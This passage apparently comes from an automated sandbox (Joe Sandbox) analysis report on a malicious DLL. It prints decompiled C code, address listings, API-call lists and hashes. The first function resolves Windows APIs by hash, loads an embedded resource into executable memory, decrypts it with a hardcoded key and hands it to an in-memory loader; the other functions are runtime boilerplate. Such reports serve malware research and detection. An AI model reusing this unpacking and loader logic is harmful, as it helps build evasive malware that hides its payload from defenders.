                                                                        						_push(0x3446e98c);
                                                                        						_t127 = _t39;
                                                                        						_t40 = E10001E60(_t181);
                                                                        						_push(L"msvcrt.dll");
                                                                        						_push(0xe094f82);
                                                                        						_push(0x20e23fe3);
                                                                        						_push(0x156af904);
                                                                        						_push(0x108d4cdc);
                                                                        						_push(0x106d66fc);
                                                                        						_t121 = E10001E60(_t181);
                                                                        						_push(0x3ee42795);
                                                                        						_push(_t121);
                                                                        						_t42 = E10001FF0();
                                                                        						_push(0x402c2791);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3f0 = _t42;
                                                                        						_t43 = E10001FF0();
                                                                        						_push(0xb29018f0);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3ec = _t43;
                                                                        						_t44 = E10001FF0();
                                                                        						_push(0xccfd283f);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3e0 = _t44;
                                                                        						_t45 = E10001FF0();
                                                                        						_push(0x298c691d);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3d0 = _t45;
                                                                        						_t46 = E10001FF0();
                                                                        						_push(0x40ec656b);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3e4 = _t46;
                                                                        						_t47 = E10001FF0();
                                                                        						_push(0x40946966);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3fc = _t47;
                                                                        						_t48 = E10001FF0();
                                                                        						_push(0x5496c247);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3a8 = _t48;
                                                                        						_t49 = E10001FF0();
                                                                        						_push(0x3b465a8a);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3ac = _t49;
                                                                        						_t50 = E10001FF0();
                                                                        						_push(0x66afc09d);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3b8 = _t50;
                                                                        						_t51 = E10001FF0();
                                                                        						_push(0x5eb2ba6);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3d4 = _t51;
                                                                        						_t52 = E10001FF0();
                                                                        						_push(0x3c6bbc0e);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3cc = _t52;
                                                                        						_t53 = E10001FF0();
                                                                        						_push(0x3f32f2a5);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3c8 = _t53;
                                                                        						_t54 = E10001FF0();
                                                                        						_push(0x112ecd9a);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3d8 = _t54;
                                                                        						_t55 = E10001FF0();
                                                                        						_push(0xcfb09550);
                                                                        						_push(_t127);
                                                                        						 *0x1004d400 = _t55;
                                                                        						_t56 = E10001FF0();
                                                                        						_push(0x30fe1b19);
                                                                        						_push(_t40);
                                                                        						 *0x1004d3bc = _t56;
                                                                        						_t57 = E10001FF0();
                                                                        						_push(0x33a92211);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3b4 = _t57;
                                                                        						_t58 = E10001FF0();
                                                                        						_push(0xaab3e2a9);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3f8 = _t58;
                                                                        						_t59 = E10001FF0();
                                                                        						_push(0x31e84135);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3f4 = _t59;
                                                                        						_t60 = E10001FF0();
                                                                        						_push(0xaef34aa1);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3dc = _t60;
                                                                        						_t61 = E10001FF0();
                                                                        						_push(0x1e75927d);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3b0 = _t61;
                                                                        						_t62 = E10001FF0();
                                                                        						_push(0x56331b6e);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3e8 = _t62;
                                                                        						_t63 = E10001FF0();
                                                                        						_push(0x1cf8ffb);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3c4 = _t63;
                                                                        						_t64 = E10001FF0();
                                                                        						_t128 = _a4;
                                                                        						 *0x1004d3c0 = _t64; // executed
                                                                        						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
                                                                        						_t123 = _t65;
                                                                        						_v4 = LoadResource(_t128, _t123);
                                                                        						_t124 = SizeofResource(_t128, _t123);
                                                                        						_t182 =  *0x1004d3b8; // 0x76d866e0
                                                                        						if(_t182 == 0) {
                                                                        							_t96 =  *0x1004b0e8; // 0x0
                                                                        							_t113 =  *0x1004b0e0; // 0x0
                                                                        							_t68 =  *0x1004b0d8; // 0x0
                                                                        							_t129 =  *0x1004b0dc; // 0x0
                                                                        							_t149 =  *0x1004b0ec; // 0x0
                                                                        							_t69 =  *0x1004b0e4; // 0x0
                                                                        							_t15 = _t113 * 2; // 0x3
                                                                        							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
                                                                        							_a8 = _t152;
                                                                        							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
                                                                        							_t20 = _t96 + 2; // 0x2
                                                                        							_t157 =  *0x1004b0d8; // 0x0
                                                                        							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
                                                                        							__eflags = _t117;
                                                                        							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
                                                                        						} else {
                                                                        							_t112 =  *0x1004b0e8; // 0x0
                                                                        							_t119 =  *0x1004b0dc; // 0x0
                                                                        							_t85 =  *0x1004b0ec; // 0x0
                                                                        							_t99 =  *0x1004b0d8; // 0x0
                                                                        							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
                                                                        							_t138 =  *0x1004b0e0; // 0x0
                                                                        							_t8 = _t138 * 2; // 0x3
                                                                        							_t100 =  *0x1004b0e0; // 0x0
                                                                        							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
                                                                        						}
                                                                        						_t133 = _t77;
                                                                        						memcpy(_t133, _v4, _t124);
                                                                        						_t79 = malloc(0x9d1);
                                                                        						_t97 = _t79;
                                                                        						E10002340();
                                                                        						E100027D0();
                                                                        						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
                                                                        						_t83 = E10005260();
                                                                        						 *0x1004d408 = _t83;
                                                                        						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
                                                                        						goto L6;
                                                                        					}
                                                                        				}
                                                                        			}


























































                                                                        0x10006246
                                                                        0x1000624b
                                                                        0x1000624c
                                                                        0x10006251
                                                                        0x10006259
                                                                        0x1000625e
                                                                        0x1000625f
                                                                        0x10006264
                                                                        0x10006269
                                                                        0x1000626e
                                                                        0x1000626f
                                                                        0x10006274
                                                                        0x10006279
                                                                        0x1000627e
                                                                        0x1000627f
                                                                        0x10006284
                                                                        0x10006289
                                                                        0x1000628e
                                                                        0x1000628f
                                                                        0x10006294
                                                                        0x10006299
                                                                        0x1000629e
                                                                        0x1000629f
                                                                        0x100062a4
                                                                        0x100062a9
                                                                        0x100062ae
                                                                        0x100062af
                                                                        0x100062b4
                                                                        0x100062b9
                                                                        0x100062be
                                                                        0x100062bf
                                                                        0x100062c4
                                                                        0x100062c9
                                                                        0x100062ce
                                                                        0x100062cf
                                                                        0x100062d4
                                                                        0x100062dc
                                                                        0x100062e1
                                                                        0x100062e2
                                                                        0x100062e7
                                                                        0x100062ec
                                                                        0x100062f1
                                                                        0x100062f2
                                                                        0x100062f7
                                                                        0x100062fc
                                                                        0x10006301
                                                                        0x10006302
                                                                        0x10006307
                                                                        0x1000630c
                                                                        0x10006311
                                                                        0x10006312
                                                                        0x10006317
                                                                        0x1000631c
                                                                        0x10006321
                                                                        0x10006322
                                                                        0x10006327
                                                                        0x1000632e
                                                                        0x10006333
                                                                        0x10006334
                                                                        0x1000633a
                                                                        0x1000633f
                                                                        0x10006344
                                                                        0x10006345
                                                                        0x1000634a
                                                                        0x1000634f
                                                                        0x10006361
                                                                        0x10006366
                                                                        0x10006368
                                                                        0x10006374
                                                                        0x1000637e
                                                                        0x10006380
                                                                        0x10006386
                                                                        0x10006432
                                                                        0x10006438
                                                                        0x1000643e
                                                                        0x10006443
                                                                        0x10006449
                                                                        0x10006459
                                                                        0x1000646d
                                                                        0x10006474
                                                                        0x10006476
                                                                        0x10006481
                                                                        0x10006487
                                                                        0x10006494
                                                                        0x100064c4
                                                                        0x100064c4
                                                                        0x100064ca
                                                                        0x1000638c
                                                                        0x1000638c
                                                                        0x10006392
                                                                        0x10006398
                                                                        0x1000639e
                                                                        0x100063a4
                                                                        0x100063b9
                                                                        0x100063d6
                                                                        0x100063fa
                                                                        0x10006427
                                                                        0x10006427
                                                                        0x100064d5
                                                                        0x100064d9
                                                                        0x100064e4
                                                                        0x100064f1
                                                                        0x10006503
                                                                        0x1000651a
                                                                        0x10006523
                                                                        0x10006546
                                                                        0x10006557
                                                                        0x1000655c
                                                                        0x00000000
                                                                        0x10006565
                                                                        0x10006133

                                                                        APIs
                                                                        • FindResourceW.KERNEL32(?,00005F4C,1003CE4C), ref: 10006366
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000636C
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 10006378
                                                                        • VirtualAllocExNuma.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
                                                                        • memcpy.MSVCRT ref: 100064D9
                                                                        • malloc.MSVCRT ref: 100064E4
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10006523
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
                                                                        • String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll
                                                                        • API String ID: 3024364686-882265788
                                                                        • Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                        • Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
                                                                        • Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                        • Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 83%
                                                                        			E10037446(signed char* __ecx) {
                                                                        				struct _CRITICAL_SECTION* _v8;
                                                                        				void* _v12;
                                                                        				char _v32;
                                                                        				char _v40;
                                                                        				char _v48;
                                                                        				signed int __edi;
                                                                        				void* __esi;
                                                                        				struct _CRITICAL_SECTION* _t42;
                                                                        				intOrPtr _t43;
                                                                        				void* _t44;
                                                                        				void* _t45;
                                                                        				void* _t49;
                                                                        				void* _t50;
                                                                        				signed int _t71;
                                                                        				signed char* _t73;
                                                                        				signed int _t82;
                                                                        				signed char* _t85;
                                                                        				void* _t87;
                                                                        				void* _t89;
                                                                        				void* _t91;
                                                                        				void* _t92;
                                                                        				void* _t94;
                                                                        
                                                                        				_t73 = __ecx;
                                                                        				_t89 = _t94;
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t85 = __ecx;
                                                                        				_t1 = _t85 + 0x1c; // 0x1004f010
                                                                        				_t42 = _t1;
                                                                        				_v8 = _t42;
                                                                        				EnterCriticalSection(_t42);
                                                                        				_t3 = _t85 + 4; // 0x20
                                                                        				_t43 =  *_t3;
                                                                        				_t4 = _t85 + 8; // 0x3
                                                                        				if( *_t4 >= _t43) {
                                                                        					L6:
                                                                        					_t82 = 1;
                                                                        					if(_t43 <= 1) {
                                                                        						L11:
                                                                        						_t20 = _t43 + 0x20; // 0x40
                                                                        						_t71 = _t20;
                                                                        						_t21 = _t85 + 0x10; // 0x3192628
                                                                        						_t44 =  *_t21;
                                                                        						if(_t44 != 0) {
                                                                        							_t45 = GlobalHandle(_t44);
                                                                        							_v12 = _t45;
                                                                        							GlobalUnlock(_t45);
                                                                        							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
                                                                        						} else {
                                                                        							_t49 = GlobalAlloc(2, _t71 << 3); // executed
                                                                        						}
                                                                        						if(_t49 != 0) {
                                                                        							_t50 = GlobalLock(_t49);
                                                                        							_t26 = _t85 + 4; // 0x20
                                                                        							_v12 = _t50;
                                                                        							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
                                                                        							 *(_t85 + 4) = _t71;
                                                                        							 *(_t85 + 0x10) = _v12;
                                                                        							goto L19;
                                                                        						} else {
                                                                        							_t24 = _t85 + 0x10; // 0x3192628
                                                                        							_t87 =  *_t24;
                                                                        							if(_t87 != 0) {
                                                                        								GlobalLock(GlobalHandle(_t87));
                                                                        							}
                                                                        							LeaveCriticalSection(_v8);
                                                                        							_push(_t89);
                                                                        							_t91 = _t94;
                                                                        							_push(_t73);
                                                                        							_v32 = 0x1004d418;
                                                                        							E10011C0F( &_v32, 0x10045dc0);
                                                                        							asm("int3");
                                                                        							_push(_t91);
                                                                        							_t92 = _t94;
                                                                        							_push(_t73);
                                                                        							_v40 = 0x1004d4b0;
                                                                        							E10011C0F( &_v40, 0x10045e04);
                                                                        							asm("int3");
                                                                        							_push(_t92);
                                                                        							_push(_t73);
                                                                        							_v48 = 0x1004d548;
                                                                        							E10011C0F( &_v48, 0x10045e48);
                                                                        							asm("int3");
                                                                        							return _t73[0x70];
                                                                        						}
                                                                        					} else {
                                                                        						_t17 = _t85 + 0x10; // 0x3192628
                                                                        						_t73 =  *_t17 + 8;
                                                                        						while(( *_t73 & 0x00000001) != 0) {
                                                                        							_t82 = _t82 + 1;
                                                                        							_t73 =  &(_t73[8]);
                                                                        							if(_t82 < _t43) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						if(_t82 < _t43) {
                                                                        							goto L19;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t12 = __esi + 0x10; // 0x3192628
                                                                        					__ecx =  *_t12;
                                                                        					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
                                                                        						L19:
                                                                        						_t33 = _t85 + 0xc; // 0x3
                                                                        						if(_t82 >=  *_t33) {
                                                                        							_t34 = _t82 + 1; // 0x4
                                                                        							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
                                                                        						}
                                                                        						_t36 = _t85 + 0x10; // 0x3192628
                                                                        						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
                                                                        						_t40 = _t82 + 1; // 0x4
                                                                        						 *((intOrPtr*)(_t85 + 8)) = _t40;
                                                                        						LeaveCriticalSection(_v8);
                                                                        						return _t82;
                                                                        					} else {
                                                                        						goto L6;
                                                                        					}
                                                                        				}
                                                                        			}

























                                                                        0x10037467
                                                                        0x1003746e
                                                                        0x10037528
                                                                        0x10037528
                                                                        0x1003752b
                                                                        0x1003752d
                                                                        0x10037530
                                                                        0x10037530
                                                                        0x10037533
                                                                        0x1003753c
                                                                        0x1003753f
                                                                        0x10037542
                                                                        0x10037545
                                                                        0x10037551
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003746e

                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
                                                                        • GlobalAlloc.KERNEL32(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
                                                                        • GlobalHandle.KERNEL32(03192628), ref: 100374B1
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
                                                                        • GlobalReAlloc.KERNEL32 ref: 100374CF
                                                                        • GlobalHandle.KERNEL32(03192628), ref: 100374E1
                                                                        • GlobalLock.KERNEL32 ref: 100374E8
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
                                                                        • GlobalLock.KERNEL32 ref: 100374FD
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10037545
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                        • String ID:
                                                                        • API String ID: 2667261700-0
                                                                        • Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                        • Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
                                                                        • Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                        • Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 91 1001614c-1001615e call 100107b6 94 10016160-10016163 91->94 95 10016168-1001617d 91->95 96 10016345-10016349 94->96 97 1001619d-1001619f 95->97 98 100161a1-100161b5 GetStartupInfoA 97->98 99 1001617f-10016197 97->99 100 100162a4 98->100 101 100161bb-100161c1 98->101 99->97 103 100162a6-100162b5 100->103 101->100 102 100161c7-100161da 101->102 104 100161dc 102->104 105 100161de-100161e4 102->105 106 100162b7-100162bd 103->106 107 10016326 103->107 104->105 108 10016234-10016238 105->108 109 100161e6 105->109 111 100162c9-100162d0 106->111 112 100162bf-100162c2 106->112 110 1001632a-1001632e 107->110 108->100 114 1001623a-10016243 108->114 115 100161eb-100161f4 call 100107b6 109->115 110->103 116 10016334-10016340 SetHandleCount 110->116 113 100162d3-100162df GetStdHandle 111->113 112->113 118 100162e1-100162ea GetFileType 113->118 119 10016320-10016324 113->119 120 10016245-1001624b 114->120 121 10016299-100162a2 114->121 130 100161f6-10016205 115->130 131 1001622e 115->131 117 10016342-10016344 116->117 117->96 118->119 123 100162ec-100162f6 118->123 119->110 120->121 124 1001624d-10016250 120->124 121->100 121->114 126 100162f8-100162fc 123->126 127 100162fe-10016301 123->127 128 10016252-1001625b GetFileType 124->128 129 1001625d-10016294 call 10019599 124->129 132 10016307-10016319 call 10019599 126->132 127->132 133 10016303 127->133 128->121 128->129 142 100162c4-100162c7 129->142 143 10016296 129->143 135 1001621d-1001621f 130->135 131->108 132->142 144 1001631b-1001631e 132->144 133->132 138 10016221-1001622a 135->138 139 10016207-1001621b 135->139 138->115 140 1001622c 138->140 139->135 140->108 142->117 143->121 144->110
                                                                        C-Code - Quality: 96%
                                                                        			E1001614C() {
                                                                        				void* __ebp;
                                                                        				signed int _t51;
                                                                        				signed int _t55;
                                                                        				long _t59;
                                                                        				signed int _t61;
                                                                        				signed int _t62;
                                                                        				signed int _t64;
                                                                        				signed int _t65;
                                                                        				void* _t69;
                                                                        				signed int* _t78;
                                                                        				signed int _t81;
                                                                        				signed int _t82;
                                                                        				signed int _t84;
                                                                        				signed int _t85;
                                                                        				signed int _t86;
                                                                        				signed char _t89;
                                                                        				signed int _t96;
                                                                        				void* _t99;
                                                                        				int _t101;
                                                                        				void** _t103;
                                                                        				void** _t105;
                                                                        				signed int** _t106;
                                                                        				intOrPtr* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_t51 = E100107B6(0x480);
                                                                        				if(_t51 != 0) {
                                                                        					 *0x1004f920 = _t51;
                                                                        					 *0x1004f90c = 0x20;
                                                                        					_t1 = _t51 + 0x480; // 0x480
                                                                        					_t84 = _t1;
                                                                        					while(1) {
                                                                        						__eflags = _t51 - _t84;
                                                                        						if(_t51 >= _t84) {
                                                                        							break;
                                                                        						}
                                                                        						 *_t51 =  *_t51 | 0xffffffff;
                                                                        						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
                                                                        						 *((char*)(_t51 + 4)) = 0;
                                                                        						 *((char*)(_t51 + 5)) = 0xa;
                                                                        						_t85 =  *0x1004f920; // 0x0
                                                                        						_t51 = _t51 + 0x24;
                                                                        						_t84 = _t85 + 0x480;
                                                                        						__eflags = _t84;
                                                                        					}
                                                                        					GetStartupInfoA(_t110 + 0x14);
                                                                        					__eflags =  *((short*)(_t110 + 0x46));
                                                                        					if( *((short*)(_t110 + 0x46)) == 0) {
                                                                        						L26:
                                                                        						_t81 = 0;
                                                                        						__eflags = 0;
                                                                        						do {
                                                                        							_t86 =  *0x1004f920; // 0x0
                                                                        							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
                                                                        							__eflags =  *_t103 - 0xffffffff;
                                                                        							if( *_t103 != 0xffffffff) {
                                                                        								_t49 =  &(_t103[1]);
                                                                        								 *_t49 = _t103[1] | 0x00000080;
                                                                        								__eflags =  *_t49;
                                                                        								goto L42;
                                                                        							}
                                                                        							__eflags = _t81;
                                                                        							_t103[1] = 0x81;
                                                                        							if(_t81 != 0) {
                                                                        								asm("sbb eax, eax");
                                                                        								_t59 =  ~(_t81 - 1) + 0xfffffff5;
                                                                        								__eflags = _t59;
                                                                        							} else {
                                                                        								_t59 = 0xfffffff6;
                                                                        							}
                                                                        							_t99 = GetStdHandle(_t59);
                                                                        							__eflags = _t99 - 0xffffffff;
                                                                        							if(_t99 == 0xffffffff) {
                                                                        								L40:
                                                                        								_t103[1] = _t103[1] | 0x00000040;
                                                                        							} else {
                                                                        								_t61 = GetFileType(_t99); // executed
                                                                        								__eflags = _t61;
                                                                        								if(_t61 == 0) {
                                                                        									goto L40;
                                                                        								}
                                                                        								_t62 = _t61 & 0x000000ff;
                                                                        								__eflags = _t62 - 2;
                                                                        								 *_t103 = _t99;
                                                                        								if(__eflags != 0) {
                                                                        									__eflags = _t62 - 3;
                                                                        									if(__eflags == 0) {
                                                                        										_t42 =  &(_t103[1]);
                                                                        										 *_t42 = _t103[1] | 0x00000008;
                                                                        										__eflags =  *_t42;
                                                                        									}
                                                                        								} else {
                                                                        									_t103[1] = _t103[1] | 0x00000040;
                                                                        								}
                                                                        								_push(0xfa0);
                                                                        								_push( &(_t103[3]));
                                                                        								_t64 = E10019599(__eflags);
                                                                        								__eflags = _t64;
                                                                        								if(_t64 == 0) {
                                                                        									L30:
                                                                        									_t55 = _t64 | 0xffffffff;
                                                                        									L44:
                                                                        									return _t55;
                                                                        								} else {
                                                                        									_t103[2] = _t103[2] + 1;
                                                                        									goto L42;
                                                                        								}
                                                                        							}
                                                                        							L42:
                                                                        							_t81 = _t81 + 1;
                                                                        							__eflags = _t81 - 3;
                                                                        						} while (_t81 < 3);
                                                                        						SetHandleCount( *0x1004f90c);
                                                                        						_t55 = 0;
                                                                        						__eflags = 0;
                                                                        						goto L44;
                                                                        					}
                                                                        					_t65 =  *(_t110 + 0x48);
                                                                        					__eflags = _t65;
                                                                        					if(_t65 == 0) {
                                                                        						goto L26;
                                                                        					}
                                                                        					_t101 =  *_t65;
                                                                        					_t109 = _t65 + 4;
                                                                        					 *(_t110 + 0x10) = _t101 + _t109;
                                                                        					__eflags = _t101 - 0x800;
                                                                        					if(_t101 >= 0x800) {
                                                                        						_t101 = 0x800;
                                                                        					}
                                                                        					__eflags =  *0x1004f90c - _t101; // 0x20
                                                                        					if(__eflags >= 0) {
                                                                        						L18:
                                                                        						_t82 = 0;
                                                                        						__eflags = _t101;
                                                                        						if(_t101 <= 0) {
                                                                        							goto L26;
                                                                        						} else {
                                                                        							goto L19;
                                                                        						}
                                                                        						do {
                                                                        							L19:
                                                                        							_t69 =  *( *(_t110 + 0x10));
                                                                        							__eflags = _t69 - 0xffffffff;
                                                                        							if(_t69 == 0xffffffff) {
                                                                        								goto L25;
                                                                        							}
                                                                        							_t89 =  *_t109;
                                                                        							__eflags = _t89 & 0x00000001;
                                                                        							if((_t89 & 0x00000001) == 0) {
                                                                        								goto L25;
                                                                        							}
                                                                        							__eflags = _t89 & 0x00000008;
                                                                        							if(__eflags != 0) {
                                                                        								L23:
                                                                        								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
                                                                        								 *_t105 =  *( *(_t110 + 0x10));
                                                                        								_t105[1] =  *_t109;
                                                                        								_push(0xfa0);
                                                                        								_push( &(_t105[3]));
                                                                        								_t64 = E10019599(__eflags);
                                                                        								__eflags = _t64;
                                                                        								if(_t64 == 0) {
                                                                        									goto L30;
                                                                        								}
                                                                        								_t31 =  &(_t105[2]);
                                                                        								 *_t31 = _t105[2] + 1;
                                                                        								__eflags =  *_t31;
                                                                        								goto L25;
                                                                        							}
                                                                        							__eflags = GetFileType(_t69);
                                                                        							if(__eflags == 0) {
                                                                        								goto L25;
                                                                        							}
                                                                        							goto L23;
                                                                        							L25:
                                                                        							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
                                                                        							_t82 = _t82 + 1;
                                                                        							_t109 = _t109 + 1;
                                                                        							__eflags = _t82 - _t101;
                                                                        						} while (_t82 < _t101);
                                                                        						goto L26;
                                                                        					} else {
                                                                        						_t106 = 0x1004f924;
                                                                        						while(1) {
                                                                        							_t78 = E100107B6(0x480);
                                                                        							__eflags = _t78;
                                                                        							if(_t78 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *0x1004f90c =  *0x1004f90c + 0x20;
                                                                        							 *_t106 = _t78;
                                                                        							_t12 =  &(_t78[0x120]); // 0x480
                                                                        							_t96 = _t12;
                                                                        							while(1) {
                                                                        								__eflags = _t78 - _t96;
                                                                        								if(_t78 >= _t96) {
                                                                        									break;
                                                                        								}
                                                                        								 *_t78 =  *_t78 | 0xffffffff;
                                                                        								_t78[2] = _t78[2] & 0x00000000;
                                                                        								_t78[1] = 0;
                                                                        								_t78[1] = 0xa;
                                                                        								_t78 =  &(_t78[9]);
                                                                        								_t96 =  &(( *_t106)[0x120]);
                                                                        								__eflags = _t96;
                                                                        							}
                                                                        							_t106 =  &(_t106[1]);
                                                                        							__eflags =  *0x1004f90c - _t101; // 0x20
                                                                        							if(__eflags < 0) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        						_t101 =  *0x1004f90c; // 0x20
                                                                        						goto L18;
                                                                        					}
                                                                        				}
                                                                        				return _t51 | 0xffffffff;
                                                                        			}


                                                                        APIs
                                                                        • GetStartupInfoA.KERNEL32(?), ref: 100161A9
                                                                        • GetFileType.KERNEL32(?), ref: 10016253
                                                                        • GetStdHandle.KERNEL32(-000000F6), ref: 100162D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
